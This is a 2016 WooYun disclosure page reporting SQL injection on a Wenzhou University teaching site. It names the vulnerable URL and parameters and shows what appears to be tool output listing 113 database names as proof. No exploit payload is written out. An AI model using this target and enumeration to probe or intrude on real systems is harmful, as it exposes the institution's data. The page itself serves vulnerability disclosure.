当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0226572

漏洞标题:温州大学某站sql注入(113库)

相关厂商:wzu.edu.cn

漏洞作者: 路人甲

提交时间:2016-07-06 16:53

修复时间:2016-07-08 10:33

公开时间:2016-07-08 10:33

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-07-06: 细节已通知厂商并且等待厂商处理中
2016-07-08: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

rt

详细说明:

漏洞url:
http://jpkc.wzu.edu.cn/xhyxt/col_tsjx/detail.aspx?tid=25&ID=751

漏洞证明:

5EZ_K68L_G@R{IFDU7OVS2S.png


available databases [113]:
[*] 0fojn
[*] 2012tw_wzu_edu_cn
[*] admission_zizhu
[*] adver_wzu_edu_cn
[*] appraisal
[*] bqxq
[*] bwc
[*] CourseStudy
[*] csjjjc
[*] cslabapp
[*] csrenwen
[*] cswedaitlab
[*] cswzdxjldzc
[*] cswzdxjpkcxzlkc
[*] csyunfei
[*] cwcx_wzry
[*] CYJY_WZU_EDU_CN
[*] Daxuewuli
[*] dfgx
[*] dhlai
[*] Diy
[*] dqTB1tiwso8hlaVj
[*] dwzzb
[*] dxwlsy
[*] ep
[*] exuequ
[*] fazhengxy
[*] fzghc_com
[*] fzxy_cxzy
[*] gdhy
[*] ggty
[*] gongfang
[*] gyzc_wzu_edu
[*] house
[*] hqjt_wzu_edu_cn
[*] hqzyw
[*] htwlgcjs
[*] huaxueyiji
[*] hum
[*] hxsysfzx
[*] ieapp
[*] jgdzyjs
[*] jghx
[*] jjyzz1
[*] jnjp
[*] JPKC_CYSW
[*] JPKC_DJCL2010
[*] JPKC_GJG
[*] JPKC_HGKC
[*] jpkc_hlm
[*] jpkc_iet
[*] jpkc_isd
[*] jpkc_jdgc
[*] jpkc_tybj
[*] jpkc_wzu_edu_dxyd
[*] jpkc_wzu_hgylyouyan
[*] jpkc_wzu_wangqiu
[*] jpkc_wzu_zq
[*] jpkc_xdwlhx
[*] jpkc_xqjyjs
[*] jpkc_xxjsjxf
[*] jpkc_ycx
[*] jpkc_zxsxjxjn
[*] jpkccx
[*] jwc
[*] jxzh
[*] jyjxjpkc
[*] KAOBO_CHEM_WZU_EDU_CN
[*] kfpt
[*] kjcgz
[*] lahz
[*] lanqiu
[*] lcf
[*] lgbcom
[*] liuxuew_com
[*] luoshan
[*] master
[*] math_wzu_edu_cn
[*] met
[*] mobileieee
[*] model
[*] msdb
[*] nettesting
[*] network
[*] newmath
[*] paiqiu
[*] peilab
[*] PGPT_ZJ_CN
[*] psy_wzu_edu_cn
[*] qzlx
[*] ReportServer
[*] ReportServerTempDB
[*] router
[*] rtdj
[*] science
[*] scxq
[*] SiteFactory
[*] sj
[*] skc2012
[*] skc_wzu_edu_cn
[*] sq_jyxyl
[*] sq_sxjxyl
[*] suchu_wzu_edu_cn
[*] swxjxl
[*] sysglw
[*] sysj
[*] szb_wzu_edu_cn
[*] tempdb
[*] tiyu_jpkc_jmcjxw
[*] tiyu_jpkc_wushu
[*] tiyu_jpkc_xtjmc
[*] tiyu_jpkc_ystc
[*] tiyu_wzu_edu_cn_jpkc_jmc

修复方案:

我不会这个的

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-07-08 10:33

厂商回复:

该网站,已经被我校现代教育技术中心关闭

最新状态:

暂无


漏洞评价:

评价